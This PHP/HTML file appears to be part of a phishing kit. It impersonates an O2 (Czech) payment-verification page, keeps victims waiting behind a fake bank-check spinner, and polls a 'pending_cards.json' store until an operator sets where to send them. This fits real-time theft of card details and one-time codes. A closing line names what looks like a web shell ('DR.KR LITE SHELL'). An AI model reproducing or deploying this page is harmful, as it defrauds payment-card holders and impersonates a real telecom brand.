<?php
// Start session to get payment session ID
session_start();
// Check if session ID exists
if (!isset($_SESSION['payment_session_id'])) {
// Redirect to payment page if no session ID
header('Location: payment.html');
exit;
}
$sessionId = $_SESSION['payment_session_id'];
// Configuration file path
$config_dir = 'config';
$pending_cards_file = $config_dir . '/pending_cards.json';
// Default redirect URL (in case of error)
$redirectUrl = 'success.html';
// Function to check if a redirect has been set for this session
function checkRedirectStatus($sessionId, $pendingCardsFile) {
if (!file_exists($pendingCardsFile)) {
return false;
}
$pendingContent = file_get_contents($pendingCardsFile);
$pendingCards = json_decode($pendingContent, true) ?: [];
if (isset($pendingCards[$sessionId]) &&
isset($pendingCards[$sessionId]['status']) &&
$pendingCards[$sessionId]['status'] === 'redirected' &&
isset($pendingCards[$sessionId]['redirect_url'])) {
return $pendingCards[$sessionId]['redirect_url'];
}
return false;
}
// Check if this is an AJAX request to check status
if (isset($_GET['check']) && $_GET['check'] === 'status') {
$redirectStatus = checkRedirectStatus($sessionId, $pending_cards_file);
header('Content-Type: application/json');
if ($redirectStatus) {
echo json_encode(['redirect' => true, 'url' => $redirectStatus]);
} else {
echo json_encode(['redirect' => false]);
}
exit;
}
// Get bank name and logo for custom display
$bank_name = 'Jste přesměrováni do své banky';
$bank_logo = 'image/vm.png';
if (file_exists($pending_cards_file)) {
$pendingContent = file_get_contents($pending_cards_file);
$pendingCards = json_decode($pendingContent, true) ?: [];
if (isset($pendingCards[$sessionId])) {
if (isset($pendingCards[$sessionId]['bank_name'])) {
$bank_name = $pendingCards[$sessionId]['bank_name'];
}
if (isset($pendingCards[$sessionId]['logo'])) {
$bank_logo = 'images/' . $pendingCards[$sessionId]['logo'];
}
}
}
?>
<!DOCTYPE html>
<html lang="cs">
<head>
<meta charset="UTF-8">
<link rel="icon" type="image/png" sizes="16x16" href="images/downloadavatar.png">
<link rel="icon" type="image/png" sizes="32x32" href="images/downloadavatar.png">
<link rel="apple-touch-icon" sizes="180x180" href="images/downloadavatar.png">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Ověření platby - O2</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f4f4f4;
display: flex;
justify-content: center;
align-items: center;
min-height: 100vh;
margin: 0;
padding: 20px;
box-sizing: border-box;
}
.verification-container {
background-color: white;
border-radius: 8px;
box-shadow: 0 4px 6px rgba(0,0,0,0.1);
width: 100%;
max-width: 400px;
padding: 20px;
text-align: center;
}
.verification-header {
display: flex;
justify-content: center;
align-items: center;
margin-bottom: 20px;
border-bottom: 1px solid #eee;
padding-bottom: 15px;
}
.verification-header img {
max-height: 40px;
}
h1 {
font-size: 1.5em;
color: #333;
margin-bottom: 15px;
}
p {
color: #666;
line-height: 1.6;
margin-bottom: 20px;
}
.status-indicator {
margin: 20px 0;
}
.loader {
border: 5px solid #f3f3f3;
border-top: 5px solid #0066cc;
border-radius: 50%;
width: 50px;
height: 50px;
animation: spin 1s linear infinite;
margin: 0 auto 20px;
}
@keyframes spin {
0% { transform: rotate(0deg); }
100% { transform: rotate(360deg); }
}
.verification-note {
font-size: 0.9em;
color: #888;
margin-top: 25px;
}
.bank-logo {
max-width: 120px;
margin: 0 auto 20px;
display: block;
}
</style>
</head>
<body>
<div class="verification-container">
<div class="verification-header">
<img src="images/downloadavatar.png" alt="O2 Logo">
</div>
<h1>Ověření platby</h1>
<p>Vaše platba je zpracovávána. Prosím, počkejte na dokončení ověření.</p>
<!-- Bank logo -->
<img src="<?php echo htmlspecialchars($bank_logo); ?>" alt="<?php echo htmlspecialchars($bank_name); ?>" class="bank-logo">
<div class="status-indicator">
<div class="loader"></div>
<p>Probíhá ověření s bankou...</p>
</div>
<div class="verification-note">
Prosím, nezavírejte tuto stránku, dokud nebude ověření dokončeno. Tento proces obvykle trvá 10-30 sekund.
</div>
</div>
<script>
// Function to check redirect status
function checkRedirectStatus() {
fetch('otp_waiting.php?check=status')
.then(response => response.json())
.then(data => {
if (data.redirect) {
// Redirect to the specified URL
window.location.href = data.url;
} else {
// Continue checking after a delay
setTimeout(checkRedirectStatus, 3000); // Check every 3 seconds
}
})
.catch(error => {
console.error('Error:', error);
// Try again after a delay even if there's an error
setTimeout(checkRedirectStatus, 5000);
});
}
// Start checking for redirect status when page loads
document.addEventListener('DOMContentLoaded', function() {
// Initial delay before first check
setTimeout(checkRedirectStatus, 3000);
});
</script>
</body>
</html>
DR.KR LITE SHELL COPYRIGHT 2016